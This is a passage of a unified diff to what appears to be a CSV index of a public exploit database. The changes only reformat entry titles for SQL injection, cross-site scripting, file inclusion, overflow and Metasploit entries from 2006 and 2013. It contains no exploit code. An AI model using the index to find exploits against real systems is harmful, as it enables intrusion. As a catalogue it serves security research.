Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos,0 27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x_DoceboKms 3.0.3_Docebo CMS 3.0.x - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x - Lang Parameter Multiple Remote File Inclusion",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 -27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 +27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 - Show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 Guestbook Index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27909,platforms/php/webapps/27909.txt,"Chipmunk Directory Index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 27910,platforms/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,php,webapps,0 @@ -25072,8 +25072,8 @@ id,file,description,date,author,platform,type,port 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 - Index.php Cross-Site Scripting",2006-06-06,Luny,php,webapps,0 27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 - Private.php Cross-Site Scripting",2006-06-06,o.y.6,php,webapps,0 -27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution",2006-06-13,"Will Dormann",windows,remote,0 -27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro Cross-Site Scripting",2006-05-23,Luny,php,webapps,0 +27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution",2006-06-13,"Will Dormann",windows,remote,0 +27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro - Cross-Site Scripting",2006-05-23,Luny,php,webapps,0 27986,platforms/windows/remote/27986.html,"Microsoft Internet Explorer 5.5/6.0/7.0 - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",windows,remote,0 27987,platforms/linux/remote/27987.html,"Firefox 1.x - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",linux,remote,0 27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 - galimage.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 @@ -25085,9 +25085,9 @@ id,file,description,date,author,platform,type,port 28002,platforms/asp/webapps/28002.txt,"KAPhotoservice 7.5 album.asp cat Parameter XSS",2006-06-09,r0t,asp,webapps,0 28003,platforms/asp/webapps/28003.txt,"KAPhotoservice 7.5 albums.asp albumid Parameter XSS",2006-06-09,r0t,asp,webapps,0 28004,platforms/asp/webapps/28004.txt,"KAPhotoservice 7.5 edtalbum.asp Multiple Parameter XSS",2006-06-09,r0t,asp,webapps,0 -28005,platforms/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection",2006-06-13,"Daniel Fabian",windows,remote,0 +28005,platforms/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection",2006-06-13,"Daniel Fabian",windows,remote,0 28006,platforms/php/webapps/28006.txt,"NPDS 5.10 - Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,php,webapps,0 -28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 URI Handler Remote Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote,0 +28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 URI Handler Remote - Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote,0 28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 28009,platforms/php/webapps/28009.txt,"Five Star Review Script - index2.php sort Parameter XSS",2006-06-12,Luny,php,webapps,0 28010,platforms/php/webapps/28010.txt,"Five Star Review Script - report.php item_id Parameter XSS",2006-06-12,Luny,php,webapps,0 @@ -25155,18 +25155,18 @@ id,file,description,date,author,platform,type,port 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28092,platforms/php/webapps/28092.txt,"MyBulletinBoard 1.0.x/1.1.x - Usercp.php SQL Injection",2006-06-22,imei,php,webapps,0 -28093,platforms/php/webapps/28093.txt,"SoftBiz Dating Script 1.0 featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 -28094,platforms/php/webapps/28094.txt,"SoftBiz Dating Script 1.0 products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28093,platforms/php/webapps/28093.txt,"SoftBiz Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28094,platforms/php/webapps/28094.txt,"SoftBiz Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28095,platforms/php/webapps/28095.txt,"SoftBiz Dating Script 1.0 - index.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 -28096,platforms/php/webapps/28096.txt,"SoftBiz Dating Script 1.0 news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 +28096,platforms/php/webapps/28096.txt,"SoftBiz Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 -28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 jscript.dll Non-Ascii Character DoS",2006-06-23,"Ivan Ivan",windows,dos,0 +28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - jscript.dll Non-Ascii Character DoS",2006-06-23,"Ivan Ivan",windows,dos,0 28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - (.cfm) Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 28103,platforms/windows/dos/28103.pl,"MailEnable 1.x - SMTP HELO Command Remote Denial of Service",2006-06-24,db0,windows,dos,0 -28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 Tmssql.php Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 +28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 28105,platforms/php/webapps/28105.txt,"eNpaper1 Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"Cpanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 @@ -25197,13 +25197,13 @@ id,file,description,date,author,platform,type,port 28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28135,platforms/osx/dos/28135.pl,"Apple Mac OS X 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection",2006-06-23,DarkFig,php,webapps,0 -28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 insertmember.php city Parameter XSS",2006-06-29,securityconnection,php,webapps,0 -28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 lostpassword.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 -28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 gen_confirm_mem.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 +28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - insertmember.php city Parameter XSS",2006-06-29,securityconnection,php,webapps,0 +28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 +28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - gen_confirm_mem.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - index.php PHPSESSID Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX Top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0 28142,platforms/php/webapps/28142.txt,"Diesel Joke Site Category.php SQL Injection",2006-07-01,black-code,php,webapps,0 -28143,platforms/php/webapps/28143.pl,"SturGeoN Upload Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 +28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0 28144,platforms/windows/dos/28144.txt,"Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,windows,dos,0 28145,platforms/windows/dos/28145.html,"Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,windows,dos,0 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0 @@ -25282,7 +25282,7 @@ id,file,description,date,author,platform,type,port 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 -28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 +28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 PPT File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28227,platforms/windows/dos/28227.txt,"Microsoft Windows 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0 @@ -25290,7 +25290,7 @@ id,file,description,date,author,platform,type,port 28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 -28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 FiltNT.SYS Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 +28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - FiltNT.SYS Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0 28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x - Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",linux,dos,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 @@ -25310,19 +25310,19 @@ id,file,description,date,author,platform,type,port 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - News.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - Common.Inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 -28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 +28254,platforms/multiple/remote/28254.txt,"Apache Tomcat 5 - Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - Index.php Directory Traversal",2006-07-21,kicktd,php,webapps,0 28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos,0 28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service",2006-07-23,hdm,windows,dos,0 28259,platforms/windows/dos/28259.txt,"Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 -28261,platforms/php/webapps/28261.txt,"RadScripts a_editpage.php filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 +28261,platforms/php/webapps/28261.txt,"RadScripts a_editpage.php filename Variable - Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service",2006-07-24,"J. Oquendo",windows,dos,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service",2006-07-24,hdm,windows,dos,0 -28266,platforms/windows/dos/28266.txt,"AGEphone 1.28/1.38 SIP Packet Handling Buffer Overflow",2006-07-24,"Tan Chew Keong",windows,dos,0 +28266,platforms/windows/dos/28266.txt,"AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow",2006-07-24,"Tan Chew Keong",windows,dos,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 counter.php tablewidth Parameter XSS",2006-07-25,simo64,php,webapps,0 28269,platforms/php/webapps/28269.txt,"LinksCaffe 3.0 links.php newdays Parameter XSS",2006-07-25,simo64,php,webapps,0 @@ -25340,7 +25340,7 @@ id,file,description,date,author,platform,type,port 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZyXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 -28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 +28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,linux,local,0 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow",2006-07-27,"Dedi Dwianto",linux,local,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 @@ -25354,12 +25354,12 @@ id,file,description,date,author,platform,type,port 28297,platforms/php/webapps/28297.txt,"JD-WordPress 2.0-1.0 RC 2 for Joomla - wp-trackback.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote,0 28299,platforms/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos,0 -28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 Contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 +28300,platforms/php/webapps/28300.txt,"Advanced Webhost Billing System 2.2.2 - Contact.php Multiple Cross-Site Scripting Vulnerabilities",2006-07-29,newbinaryfile,php,webapps,0 28301,platforms/windows/dos/28301.txt,"Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service",2006-07-29,hdm,windows,dos,0 28302,platforms/php/webapps/28302.txt,"Liga Manager Online 2.0 Joomla! Component - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0 28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 Top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 -28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 operator_chattranscript.php chatid Parameter Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 +28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 operator_chattranscript.php chatid Parameter Traversal - Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 signup.php site_name Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 @@ -25386,13 +25386,13 @@ id,file,description,date,author,platform,type,port 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28331,platforms/windows/remote/28331.txt,"Oracle Java ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Local Privilege Escalation",2013-09-17,Metasploit,linux,local,0 -28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152 -28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 -28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0 +28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152 +28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 +28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security - Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0 28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 -28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 +28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 -28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 +28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 28340,platforms/multiple/webapps/28340.c,"PSWD.JS Insecure Password Hash Weakness",2006-08-03,"Gianstefano Monni",multiple,webapps,0 28341,platforms/windows/dos/28341.txt,"Yahoo! Messenger 8.0.0.863 - File Extension Spoofing",2006-08-04,ivancool2003,windows,dos,0 28342,platforms/php/webapps/28342.txt,"VBulletin 3.0.14 global.php Encoded URL XSS",2006-08-05,imei,php,webapps,0 @@ -25426,10 +25426,10 @@ id,file,description,date,author,platform,type,port 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - Index.php Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 -28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 Ascan_6.ASP ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote,0 +28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 - Ascan_6.ASP ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote,0 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote,0 28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 -28376,platforms/windows/remote/28376.html,"McKesson ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 +28376,platforms/windows/remote/28376.html,"McKesson - ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 @@ -25440,18 +25440,18 @@ id,file,description,date,author,platform,type,port 28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos,0 -28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service",2006-08-15,nop,windows,dos,0 +28387,platforms/windows/dos/28387.html,"Microsoft Internet Explorer 6.0 - IMSKDIC.DLL Denial of Service",2006-08-15,nop,windows,dos,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 -28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service",2006-08-15,nop,windows,dos,0 +28389,platforms/windows/dos/28389.html,"Microsoft Internet Explorer 6.0 - MSOE.DLL Denial of Service",2006-08-15,nop,windows,dos,0 28390,platforms/php/webapps/28390.txt,"Lizge 20 - Index.php Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0 28391,platforms/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos,0 28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - autoload_func.php autoLoadConfig[999][0][loadFile] Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 28396,platforms/php/webapps/28396.txt,"Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 28397,platforms/linux/remote/28397.sh,"GNU BinUtils 2.1x GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote,0 -28398,platforms/linux/remote/28398.txt,"MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 +28398,platforms/linux/remote/28398.txt,"MySQL 4/5 SUID Routine Miscalculation - Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 -28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 +28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6.0 - TSUserEX.DLL ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0 28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 @@ -25478,7 +25478,7 @@ id,file,description,date,author,platform,type,port 28424,platforms/linux/remote/28424.txt,"Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 -28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 +28427,platforms/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 28428,platforms/php/webapps/28428.txt,"Yapig 0.9x Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - Index.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 @@ -25502,11 +25502,11 @@ id,file,description,date,author,platform,type,port 28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - admin/newsletters.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - admin/orders_status.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 